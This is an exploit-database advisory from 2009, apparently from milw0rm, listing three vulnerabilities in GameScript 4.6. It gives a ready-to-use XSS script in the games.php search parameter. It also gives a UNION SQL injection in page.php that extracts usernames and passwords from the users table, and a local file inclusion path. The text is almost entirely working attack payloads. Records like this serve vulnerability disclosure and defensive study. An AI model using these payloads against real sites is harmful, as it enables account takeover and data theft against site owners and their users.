gamescript 4.6 - Cross-Site Scripting / SQL Injection / Local File Inclusion

Author: Encrypt3d.M!nd
type: webapps
platform: php
port: 
date_added: 2009-01-27 
date_updated:  
verified: 1 
codes: OSVDB-51654;OSVDB-51649;OSVDB-51648 
tags: 
aliases:  
screenshot_url:  
application_url: 

GameScript 4.6 Multiple Vulnerabillities
(Earlier versions might be affected)

By : Encrypt3d.M!nd

Demo :www.gsdemo.com
just bored  :)
There are other vulnerabillities i think

Iam Iraqian...Not Arabian
###################################################

Xss :

/games.php?search="<script>alert(666);</script>


Sql injection :

/page.php?page=viewprofile&user=-Encrypt3d'%20union%20select%201,2,username,4,5,password,7,8,9,10,11,12%20from%20users/*

Local File Include :

/page.php?page=file_to_include

# milw0rm.com [2009-01-28]